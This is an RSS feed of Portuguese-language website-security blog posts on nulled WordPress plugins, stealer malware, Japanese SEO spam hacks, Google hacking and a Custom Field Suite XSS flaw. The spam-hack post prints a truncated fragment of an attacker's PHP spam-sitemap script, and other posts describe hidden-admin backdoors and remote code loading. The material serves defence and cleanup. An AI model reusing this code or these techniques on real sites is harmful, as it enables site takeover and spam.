<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Arquivos remoção de malware - ETH SECURITY</title>
	<atom:link href="https://ethsecurity.com.br/remocao-de-malware/feed/" rel="self" type="application/rss+xml" />
	<link></link>
	<description>Especialista em segurança de sites</description>
	<lastBuildDate>Fri, 25 Jul 2025 18:12:47 +0000</lastBuildDate>
	<language>pt-BR</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.3</generator>

<image>
	<url>https://ethsecurity.com.br/wp-content/uploads/2019/04/logo-150x150.jpg</url>
	<title>Arquivos remoção de malware - ETH SECURITY</title>
	<link></link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">161029545</site>	<item>
		<title>Plugins Piratas &#8211; Análise técnica</title>
		<link>https://ethsecurity.com.br/plugins-piratas-analise-tecnica/</link>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Fri, 25 Jul 2025 17:38:28 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[remoção de malware]]></category>
		<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[Segurança wordpress]]></category>
		<category><![CDATA[plugin nulled]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<guid isPermaLink="false">https://ethsecurity.com.br/?p=458</guid>

					<description><![CDATA[<p>Você ja se perguntou qual seria o perigo de instalar um plugin ou tema pirata em seu site? Será seguro? oque vai acontecer se eu usar? Para responder essas perguntas decidimos baixar um plugin pirata de um site que oferece os temas e plugins nulled, instalar em um ambiente controlado e ver as alterações e [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/">Plugins Piratas &#8211; Análise técnica</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Você ja se perguntou qual seria o perigo de instalar um plugin ou tema pirata em seu site? Será seguro? oque vai acontecer se eu usar?</p>
<p>Para responder essas perguntas decidimos baixar um plugin pirata de um site que oferece os temas e plugins nulled, instalar em um ambiente controlado e ver as alterações e quais os perigos que quem instala plugins e temas nulled estão correndo.</p>
<p>Baixamos o arquivo do plugin e antes mesmo de instalar realizamos um scan com assinturas comerciais do clamav e ja encontramos o primeiro problema:</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/scan/" rel="attachment wp-att-470"><img fetchpriority="high" decoding="async" class="aligncenter wp-image-470 size-full" src="https://ethsecurity.com.br/wp-content/uploads/2025/07/scan.png" alt="" width="925" height="268" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/scan.png 925w, https://ethsecurity.com.br/wp-content/uploads/2025/07/scan-300x87.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/scan-700x203.png 700w, https://ethsecurity.com.br/wp-content/uploads/2025/07/scan-150x43.png 150w, https://ethsecurity.com.br/wp-content/uploads/2025/07/scan-768x223.png 768w" sizes="(max-width: 925px) 100vw, 925px" /></a></p>
<p>&nbsp;</p>
<p>A assinatura já nos da uma pista do malware que está nesse arquivo porém vamos analisar mais a fundo:</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/malware/" rel="attachment wp-att-471"><img decoding="async" class="aligncenter size-full wp-image-471" src="https://ethsecurity.com.br/wp-content/uploads/2025/07/malware.png" alt="" width="1855" height="271" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/malware.png 1855w, https://ethsecurity.com.br/wp-content/uploads/2025/07/malware-300x44.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/malware-700x102.png 700w, https://ethsecurity.com.br/wp-content/uploads/2025/07/malware-150x22.png 150w, https://ethsecurity.com.br/wp-content/uploads/2025/07/malware-768x112.png 768w, https://ethsecurity.com.br/wp-content/uploads/2025/07/malware-1536x224.png 1536w" sizes="(max-width: 1855px) 100vw, 1855px" /></a></p>
<p>Em uma rápida analise o código acima faz:</p>
<ul>
<li>Cria um usuário administrador oculto com login fixo (default) e senha pré-definida.</li>
<li>Esconde esse usuário da listagem de administradores no painel WordPress, alterando queries e contadores.</li>
<li>Envia informações do site (URL e data) para um servidor externo (llllll.my).</li>
<li>Injeta código malicioso em arquivos sensíveis (footer.php, functions.php, formatting.php) de todos os temas.</li>
<li>Carrega código remoto de outro servidor (panel.hac&#8230;..) sempre que o site é acessado.</li>
<li>Desativa cache no site para garantir que os scripts maliciosos sempre sejam executados.</li>
<li>Se instala de forma persistente, dificultando a detecção e remoção.</li>
</ul>
<p>Então resolvemos instalar o plugin e analisar o comportamento.</p>
<p>&nbsp;</p>
<p>Após o pluign instalado o que olhamos primeiro é a tabela de usuários</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/admin-list/" rel="attachment wp-att-472"><img decoding="async" class="aligncenter wp-image-472 " src="https://ethsecurity.com.br/wp-content/uploads/2025/07/admin-list-700x383.png" alt="" width="541" height="296" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/admin-list-700x383.png 700w, https://ethsecurity.com.br/wp-content/uploads/2025/07/admin-list-300x164.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/admin-list-150x82.png 150w, https://ethsecurity.com.br/wp-content/uploads/2025/07/admin-list-768x420.png 768w, https://ethsecurity.com.br/wp-content/uploads/2025/07/admin-list.png 951w" sizes="(max-width: 541px) 100vw, 541px" /></a></p>
<p>&nbsp;</p>
<p>Na tabela de usuários pelo wordpress não existe nenhum usuário maliciosos, mas se formos direto no banco de dados:</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/banco/" rel="attachment wp-att-473"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-473" src="https://ethsecurity.com.br/wp-content/uploads/2025/07/banco.png" alt="" width="1068" height="156" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/banco.png 1068w, https://ethsecurity.com.br/wp-content/uploads/2025/07/banco-300x44.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/banco-700x102.png 700w, https://ethsecurity.com.br/wp-content/uploads/2025/07/banco-150x22.png 150w, https://ethsecurity.com.br/wp-content/uploads/2025/07/banco-768x112.png 768w" sizes="auto, (max-width: 1068px) 100vw, 1068px" /></a></p>
<p>&nbsp;</p>
<p>Isso acontece por causa desse trecho de código, que esconde o usuário no backend do wordpress:</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/script/" rel="attachment wp-att-474"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-474" src="https://ethsecurity.com.br/wp-content/uploads/2025/07/script.png" alt="" width="560" height="261" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/script.png 560w, https://ethsecurity.com.br/wp-content/uploads/2025/07/script-300x140.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/script-150x70.png 150w" sizes="auto, (max-width: 560px) 100vw, 560px" /></a></p>
<p>Note que o código acima tem o usuário e a senha do user malicioso, o nível de acesso do usário e a opção para esconder o mesmo no admin bar, dificultando a vida de quem não possui um conhecimento mais técnico para remoção das infecções.</p>
<p>Seguindo em frente, o seguinte código foi adicionado no footer do tema, direcionando os visitantes para sites de spam, comprometendo o trafego do site, SEO e resultados de mecanismos de busca.</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/footer/" rel="attachment wp-att-475"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-475" src="https://ethsecurity.com.br/wp-content/uploads/2025/07/footer.png" alt="" width="1876" height="138" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/footer.png 1876w, https://ethsecurity.com.br/wp-content/uploads/2025/07/footer-300x22.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/footer-700x51.png 700w, https://ethsecurity.com.br/wp-content/uploads/2025/07/footer-150x11.png 150w, https://ethsecurity.com.br/wp-content/uploads/2025/07/footer-768x56.png 768w, https://ethsecurity.com.br/wp-content/uploads/2025/07/footer-1536x113.png 1536w" sizes="auto, (max-width: 1876px) 100vw, 1876px" /></a></p>
<p>Por último o script envia os dados do site para um site terceiro, avisando que aquele site está sob controle do invasor:</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/outbound/" rel="attachment wp-att-476"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-476" src="https://ethsecurity.com.br/wp-content/uploads/2025/07/outbound.png" alt="" width="786" height="251" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/outbound.png 786w, https://ethsecurity.com.br/wp-content/uploads/2025/07/outbound-300x96.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/outbound-700x224.png 700w, https://ethsecurity.com.br/wp-content/uploads/2025/07/outbound-150x48.png 150w, https://ethsecurity.com.br/wp-content/uploads/2025/07/outbound-768x245.png 768w" sizes="auto, (max-width: 786px) 100vw, 786px" /></a></p>
<p>&nbsp;</p>
<p>Com isso completa-se a análise, chegando a conclusão de que nunca se deve utilizar plugins ou temas de fontes duvidosas, além de você não ter suporte para aplicação você estará entregando seu site para terceiros realizarem envio de spam, ataques a outros hosts ou hospedagem de phishing.</p>
<p>&nbsp;</p>
<p>O post <a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/">Plugins Piratas &#8211; Análise técnica</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">458</post-id>	</item>
		<item>
		<title>Você sabe o que é um &#8220;Malware Stealer&#8221;?</title>
		<link>https://ethsecurity.com.br/voce-sabe-o-que-e-um-malware-stealer/</link>
		
		<dc:creator><![CDATA[sec-girl]]></dc:creator>
		<pubDate>Fri, 27 Sep 2024 14:20:34 +0000</pubDate>
				<category><![CDATA[remoção de malware]]></category>
		<category><![CDATA[Segurança na web]]></category>
		<guid isPermaLink="false">https://ethsecurity.com.br/?p=412</guid>

					<description><![CDATA[<p>Termo estranho a &#8220;primeira lida&#8221;, mas calma, eu explico. Um malware stealer se trata de um malware capaz de roubar informações que ficam salvas em navegadores web e/ou estão em seu computador. Sim, seus usuarios e senhas, preenchimento de formulários, dados do cartão de crédito, programas instalados e cookies de sessão são os principais alvos [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/voce-sabe-o-que-e-um-malware-stealer/">Você sabe o que é um &#8220;Malware Stealer&#8221;?</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p id="ember530" class="ember-view reader-text-block__paragraph">Termo estranho a &#8220;primeira lida&#8221;, mas calma, eu explico.</p>
<p id="ember531" class="ember-view reader-text-block__paragraph">Um malware stealer se trata de um malware capaz de roubar informações que ficam salvas em navegadores web e/ou estão em seu computador. Sim, seus usuarios e senhas, preenchimento de formulários, dados do cartão de crédito, programas instalados e cookies de sessão são os principais alvos desses agentes maliciosos.</p>
<p id="ember532" class="ember-view reader-text-block__paragraph">Os &#8220;Malwares Ladrões&#8221;, na tradução literal, estão cada vez mais comuns como ameaça cibernética, visto que os dados são informações valiosas no submundo, onde ocorrem a venda dessas credenciais. Essas informações de usuários e senhas são comercializados para aplicação de golpes, também podem dar acesso a contas corporativas, contas bancários, informações pessoais e muitos outros usos indevidos a partir dos dados roubados.</p>
<p id="ember533" class="ember-view reader-text-block__paragraph">Buscando na web por Roubo de credenciais é possível ver que há várias noticias sobre o assunto e, infelizemente, o Brasil é recorde nessa questão.</p>
<p id="ember534" class="ember-view reader-text-block__paragraph">Alguns nomes conhecidos são <strong>Redline, ZeuS, Raccoon</strong>mas há muitos outros, e novos irão surgir.</p>
<hr class="reader-divider-block__horizontal-rule" />
<p id="ember535" class="ember-view reader-text-block__paragraph">E como eles se propagam? Infelizmente por vários meios. Alguns mais comuns são:</p>
<ul>
<li><strong>Anexos de e-mail maliciosos:</strong>um pdf, um docx malicioso recebido por email pode fazer a instalação do malware caso não seja detectado imediatamente.</li>
<li><strong>Downloads de softwares piratas ou não confiável:</strong>sabe quando voce baixa um arquivo executavel em um site de downloads? Tipo aquele pra baixar musica em MP3 do youtube ou aquele APK que te da o jogo do celular cheio de moedas. Nem sempre esses executáveis são seguros, pode ser que embutido no código esteja o malware que infecta o computador ou celular roubando os dados.</li>
<li><strong>Softwares ou extensões vulneráveis:</strong>Deixar o software sem as atualizações de segurança também permite a instalação do malware. Baixar extensões no navegador sem conhecer o fabricante ou quem a desenvolveu também coloca em risco as informações</li>
</ul>
<hr class="reader-divider-block__horizontal-rule" />
<p id="ember537" class="ember-view reader-text-block__paragraph">É possivel evitar ser infectado ou detectar a ameaça? Sim, há algumas dicas que são importantes e podem ser lembradas facilmente:</p>
<ul>
<li>Revise suas senhas de tempos em tempos, nas configurações do próprio navegador há alertas para alguns vazamentos. Revise também sites antigos os quais você não acessa mais.</li>
<li>Ative o Duplo Fator de Autenticação em tudo o que for possível, isso pode dar um alerta caso alguem tente acessar sua conta sem sua permissão. Pode ser por email, porém o recomendado é ter o login vinculado a um código de OTP, como aplicativo Google Authenticator.</li>
<li>Mantenha seu software de segurança atualizado, sempre é recomendado usar um antivirus confiavel instalado.(Baixado diretamente do site do fabricante para não correr o risco de ter o malware instalado pelo proprio anti-malware)</li>
<li>Não instale qualquer extensão em seu navegador apenas para facilitar o dia-a-dia. Sabe os termos de privacidade? Pegue o costume de ler, se estiver escrito algo como &#8220;compartilhamos seus dados com terceiros&#8221; é um sinal de alerta, ou se não houver nenhum termo é um sinal vermelho de alerta. Busque extensões de grandes empresas ao invés de extensões que ainda não possuem um procedimento de segurança bem elaborado.</li>
<li>Fique atento caso note comportamentos inesperados de seu computador, uma lentidão fora do comum, pop-ups aparecendo sem horário definido, notificações do tipo &#8220;encontramos 42 virus no seu computador, clique aqui para limpar&#8221; sem ter nenhum sistema que faça essa verificação.</li>
<li>Verifique o Gerenciador de Tarefas, nele é possível ver todos os processos em execução, incluindo os maliciosos. Pesquise pelo nome dos processos para entender o que eles fazem e se são nocivos ao seu computador.</li>
<li>Analise os arquivos suspeitos em um serviço online confiável. Aqui indico o Virus Total(www.virustotal.com). Ele possui a análise online de URLs e arquivos e indica caso seja um arquivo ja identificado como malicioso anteriormente.
<p>Fonte: Texto publicado no meu linkedin, o qual agora, compartilho tambem no blog do ETH Security</p>
<div class="mceTemp"></div>
</li>
</ul>
<p>O post <a href="https://ethsecurity.com.br/voce-sabe-o-que-e-um-malware-stealer/">Você sabe o que é um &#8220;Malware Stealer&#8221;?</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">412</post-id>	</item>
		<item>
		<title>Invasão site com resultados em Japonês no Google, o que fazer?</title>
		<link>https://ethsecurity.com.br/invasao-site-com-resultados-em-japones-no-google-o-que-fazer/</link>
					<comments>https://ethsecurity.com.br/invasao-site-com-resultados-em-japones-no-google-o-que-fazer/#respond</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Mon, 22 Jul 2019 22:14:31 +0000</pubDate>
				<category><![CDATA[remoção de malware]]></category>
		<category><![CDATA[Segurança na web]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=343</guid>

					<description><![CDATA[<p>Imagine procurar seu site no Google para checar como estão os resultados e se deparar com isso: &#160; &#160; Essa é uma péssima notícia, pois toda sua indexação e SEO no Google foram perdidos e substituídos por conteúdo de SPAM, com isso seu site começa a receber várias requisições do Google, o que faz com [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/invasao-site-com-resultados-em-japones-no-google-o-que-fazer/">Invasão site com resultados em Japonês no Google, o que fazer?</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Imagine procurar seu site no Google para checar como estão os resultados e se deparar com isso:</p>
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="wp-image-344 size-full aligncenter" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/07/Screenshot_1.jpg" alt="" width="650" height="538" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/07/Screenshot_1.jpg 650w, https://ethsecurity.com.br/wp-content/uploads/2019/07/Screenshot_1-150x124.jpg 150w, https://ethsecurity.com.br/wp-content/uploads/2019/07/Screenshot_1-300x248.jpg 300w" sizes="auto, (max-width: 650px) 100vw, 650px" /></p>
<p>&nbsp;</p>
<p>Essa é uma péssima notícia, pois toda sua indexação e SEO no Google foram perdidos e substituídos por conteúdo de SPAM, com isso seu site começa a receber várias requisições do Google, o que faz com que cause até mesmo a indisponibilidade, é assim que muitos detectam a invasão, devido as várias requisições de bots de buscadores.</p>
<p>&nbsp;</p>
<h3>Como isso ocorre?</h3>
<p>A grande maioria dos casos são devido ao roubo de credenciais do wp-admin, sendo assim o cuidado com suas credencias sempre deve ser redobrado, inclusive com o email que é utilizado para o usuário administrador do WordPress.</p>
<p>Uma vez acessada a área administrativa do WordPress, o invasor utiliza o theme-editor para remover o conteúdo original de uma página, como o 404.php e substituíla por um backdoor, que dará acesso a todo o conteúdo FTP do site.</p>
<p>Com acesso ao FTP o invasor pega a propriedade do site alvo no Google, o que lhe permite solicitar indexação de conteúdo, então envia as páginas de spam a erem indexadas para alguns diretórios no site, geralmente arquivos html, e solicita que o Google as indexe através de um sitemap, segue um exemplo de script utilizado para isso:</p>
<p>&nbsp;</p>
<p>&lt;?php<br />
@set_time_limit(3600);<br />
@ignore_user_abort(1);<br />
$xmlname = &#8216;mapss182_183.xml&#8217;;<br />
$jdir = &#8221;;<br />
$smuri_tmp = smrequest_uri();<br />
if($smuri_tmp==&#8221;){<br />
$smuri_tmp=&#8217;/&#8217;;<br />
}<br />
$smuri = base64_encode($smuri_tmp);<br />
$dt = 0;<br />
function smrequest_uri(){<br />
if (isset($_SERVER[&#8216;REQUEST_URI&#8217;])){<br />
$smuri = $_SERVER[&#8216;REQUEST_URI&#8217;];<br />
}else{<br />
if(isset($_SERVER[&#8216;argv&#8217;])){<br />
$smuri = $_SERVER[&#8216;PHP_SELF&#8217;] . &#8216;?&#8217; . $_SERVER[&#8216;argv&#8217;][0];<br />
}else{<br />
$smuri = $_SERVER[&#8216;PHP_SELF&#8217;] . &#8216;?&#8217; . $_SERVER[&#8216;QUERY_STRING&#8217;];<br />
}<br />
}<br />
return $smuri;<br />
}<br />
$sitemap_file = &#8216;sitemapwebxml&#8217;;<br />
$num = 100;<br />
$mapnum = 25;<br />
$kid = rand(1,9009);</p>
<p>&nbsp;</p>
<h3>O que fazer?</h3>
<p>Infelizmente essa é a invasão que mais causa prejuízo a longo prazo para a imagem de seu site na internet, pois o trabalho para remover as urls de spam dos resultados do Google é demorado e exaustivo, demorando até alguns meses.</p>
<p>Primeiramente pegue novamente a propriedade de seu site no Google usando <a href="https://support.google.com/webmasters/answer/9008080?hl=pt-BR">esse tutorial</a>, depois  remova todos os usuários que não seja você que estiverem com a propriedade do site no Google para evitar que novas requisições sejam feitas.</p>
<p>Coloque o site em modo de manutenção e realize um scan completo para remover todos os malwares do site, caso tenha dificuldades para realizar esse procedimento de scan, nossa equipe tem um <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">serviço de scan</a> que pode lhe auxiliar a remover as infecções.</p>
<p>Altere todas as suas senhas e verifique todos os computadores que você utiliza, inclusive celulares, com um antivírus atualizado.</p>
<p>Com as infecções removidas e as páginas também o conteúdo começará a dar 404 para as requisições no Google, o que fará com que sejam removidos os resultados do Google gradualmente.</p>
<p>Para fazer com que seu site seja indexado pelo Google novamente é recomendável que crie e faça upload de um sitemap para que suas páginas sejam indexadas, <a href="https://vooozer.com/blog/marketing-digital/como-criar-um-sitemap/">este tutorial</a> mostra como realizar.</p>
<p>Dúvidas? basta comentar abaixo.</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>O post <a href="https://ethsecurity.com.br/invasao-site-com-resultados-em-japones-no-google-o-que-fazer/">Invasão site com resultados em Japonês no Google, o que fazer?</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/invasao-site-com-resultados-em-japones-no-google-o-que-fazer/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">343</post-id>	</item>
		<item>
		<title>Proteja seu site: Como evitar o Google Hacking.</title>
		<link>https://ethsecurity.com.br/proteja-seu-site-como-evitar-o-google-hacking/</link>
					<comments>https://ethsecurity.com.br/proteja-seu-site-como-evitar-o-google-hacking/#comments</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Sun, 16 Jun 2019 20:01:45 +0000</pubDate>
				<category><![CDATA[remoção de malware]]></category>
		<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=334</guid>

					<description><![CDATA[<p>Você já ouviu falar de Google Hacking? como isso é possível? quais as boas práticas para evitar ser hackeado através dessa técnica? vamos responder essas perguntas neste post. Conceito: Como o Google e outros buscadores funcionam? talvez alguns respondam que ele indexa páginas da web e mostra os resultados em suas pesquisas, mas como ele [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/proteja-seu-site-como-evitar-o-google-hacking/">Proteja seu site: Como evitar o Google Hacking.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Você já ouviu falar de Google Hacking? como isso é possível? quais as boas práticas para evitar ser hackeado através dessa técnica? vamos responder essas perguntas neste post.</p>
<h3>Conceito:</h3>
<p>Como o Google e outros buscadores funcionam? talvez alguns respondam que ele indexa páginas da web e mostra os resultados em suas pesquisas, mas como ele faz isso? Imagine que você vai até uma cidade desconhecida e tem um amigo que mora lá há alguns anos, você precisa se deslocar até certos lugares que não conhece, então você pergunta a esse amigo onde esses lugares ficam e ele te instrui corretamente a melhor maneira de como encontrar os lugares, como isso é possível? Porque ele já esteve lá antes, o Google trabalha dessa mesma maneira, ele sabe o conteúdo dos sites porque já esteve la antes, já os visitou e indexou em seu banco de dados com os seus bots, seus buscadores que indexam os sites e os resultados são organizados em sua base de dados para que sejam mostrados nas pesquisas.</p>
<p>&nbsp;</p>
<h3>Controlando a indexação:</h3>
<p>Existe uma maneira de você controlar o que o Google e outros buscadores indexam em seu site, no arquivo <a href="https://support.google.com/webmasters/answer/6062596?hl=pt-BR">robots.txt</a> você pode definir os buscadores que poderão enxergar em seu site e o que poderão indexar, para que somente o conteúdo público seja mostrado.</p>
<p>&nbsp;</p>
<h3>Perigos:</h3>
<p>Assim como o Google indexa suas páginas ele também pode indexar tudo o que está na raiz de seu site, onde estão os scripts que fazem o mesmo funcionar, através desta técnica de busca é possível encontrar endereços em que seus administradores deixaram arquivos que oferecem um grande risco a segurança, usando como exemplo do WordPress existem 3 grandes perigos.</p>
<p>&nbsp;</p>
<h3>Backups da base de dados:</h3>
<p>Uma base de dados na raiz do site fica disponível para download com várias informações críticas de segurança, as mais críticas são o usuário e o hash da senha, com essas informações em mãos um terceiro mal intencionado pode fazer um ataque de bruteforce no hash e conseguir acesso à área administrativa de seu WordPress.</p>
<h3>Backup compactado de seus arquivos:</h3>
<p>Da mesma maneira que alguém encontra  um arquivo .sql com o Google Hacking, é possível encontrar arquivos compactados, como o zip ou tar.gz, no caso do WordPress dentro desse arquivo compactado estará o wp-config.php, expondo assim o usuário e senha do banco de dados, fazendo com que seja possível acessar o mesmo e alterar a senha ou adicionar um novo usuário administrador.</p>
<h3>WordPress sem o wp-config.php configurado:</h3>
<p>Este é o mais perigoso entre eles, pois caso você deixe uma instalação do WordPress em branco em seu docummet root, invasores buscarão por essa falha e quando a encontrarem  farão uma nova instalação do WordPress utilizando uma base de dados externa, dando-lhe total acesso administrativo para upload de backdoors, páginas de phsihing e outros tipos de pragas virtuais que assolam vários sites pelo mundo.</p>
<p>&nbsp;</p>
<h3>Conclusão:</h3>
<p>Com isso vemos que é preciso deixar somente o necessário na raiz de seu site e evitar deixa-lo como repositório para evitar surpresas desagradáveis, caso tenham algum dúvida sobre o conteúdo fiquem a vontade para se expressar nos comentários.</p>
<p>O post <a href="https://ethsecurity.com.br/proteja-seu-site-como-evitar-o-google-hacking/">Proteja seu site: Como evitar o Google Hacking.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/proteja-seu-site-como-evitar-o-google-hacking/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">334</post-id>	</item>
		<item>
		<title>Vulnerabilidade no Plugin Custom Field Suit do WordPress</title>
		<link>https://ethsecurity.com.br/vulnerabilidade-no-plugin-custom-field-suit-do-wordpress/</link>
					<comments>https://ethsecurity.com.br/vulnerabilidade-no-plugin-custom-field-suit-do-wordpress/#respond</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Fri, 17 May 2019 00:39:27 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[remoção de malware]]></category>
		<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[Segurança wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=308</guid>

					<description><![CDATA[<p>Fizemos uma introdução sobre a falha no site parceiro sobre a vulnerabilidade no plugin Custom Field Suit do WordPress. Mais de 40.000 instalações do WordPress que utilizam esse plugin, segundo o site do desenvolvedor, tem sofrido ataques de Cross Site Scripting (XSS), técnica que tem por objetivo inserir conteúdo não autorizado no site alvo. A [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/vulnerabilidade-no-plugin-custom-field-suit-do-wordpress/">Vulnerabilidade no Plugin Custom Field Suit do WordPress</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2>Fizemos uma introdução sobre a falha no <a href="https://blog.sinesio.com.br">site parceiro</a> sobre a vulnerabilidade no <a href="https://blog.sinesio.com.br/pentest-e-seguranca/vulnerabilidade-de-xss-vem-sendo-explorada-custom-field-suite/">plugin Custom Field Suit do WordPress.</a></h2>
<p>Mais de 40.000 instalações do WordPress que utilizam esse plugin, segundo o site do desenvolvedor, tem sofrido ataques de Cross Site Scripting (XSS), técnica que tem por objetivo inserir conteúdo não autorizado no site alvo.</p>
<h3>A falha:</h3>
<p>A função &#8220;manage_options&#8221; existente no arquivo /includes/init.php tem como objetivo atualizar as opções do plugin no banco de dados, a falta de uma verificação de autenticação de privilégios de usuários faz com que invasores possam inserir códigos no banco de dados, abaixo utilizamos um exploit para inserir um javascrit alert toda vez que um post novo for criado:</p>
<p><img loading="lazy" decoding="async" class="wp-image-311 size-full aligncenter" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/05/Captura-de-tela-de-2019-05-16-20-33-55.png" alt="" width="623" height="201" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/05/Captura-de-tela-de-2019-05-16-20-33-55.png 623w, https://ethsecurity.com.br/wp-content/uploads/2019/05/Captura-de-tela-de-2019-05-16-20-33-55-150x48.png 150w, https://ethsecurity.com.br/wp-content/uploads/2019/05/Captura-de-tela-de-2019-05-16-20-33-55-300x97.png 300w" sizes="auto, (max-width: 623px) 100vw, 623px" /></p>
<p>Abaixo o resultado da exploração:</p>
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-312 size-full" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/05/Captura-de-tela-de-2019-05-16-20-37-00.png" alt="" width="1061" height="228" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/05/Captura-de-tela-de-2019-05-16-20-37-00.png 1061w, https://ethsecurity.com.br/wp-content/uploads/2019/05/Captura-de-tela-de-2019-05-16-20-37-00-150x32.png 150w, https://ethsecurity.com.br/wp-content/uploads/2019/05/Captura-de-tela-de-2019-05-16-20-37-00-300x64.png 300w, https://ethsecurity.com.br/wp-content/uploads/2019/05/Captura-de-tela-de-2019-05-16-20-37-00-768x165.png 768w, https://ethsecurity.com.br/wp-content/uploads/2019/05/Captura-de-tela-de-2019-05-16-20-37-00-700x150.png 700w" sizes="auto, (max-width: 1061px) 100vw, 1061px" /></p>
<p>&nbsp;</p>
<p>Se você foi vítima dessa exploração encontrará uma linha similar nos logs do apache:</p>
<p>192.168.1.12 &#8211; &#8211; [16/May/2019:20:36:14 -0300] &#8220;POST /wp-admin/admin-ajax.php?action=cfs_ajax_handler HTTP/1.1&#8221; 200 562 &#8220;http://192.168.1.5/teste.php&#8221; &#8220;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36&#8221;</p>
<p>&nbsp;</p>
<h3>Contra medida:</h3>
<p>A atualização para esta falha já foi lançada pelo desenvolvedor, então a fim de se prevenir recomendamos atualizar o mais rápido possível.</p>
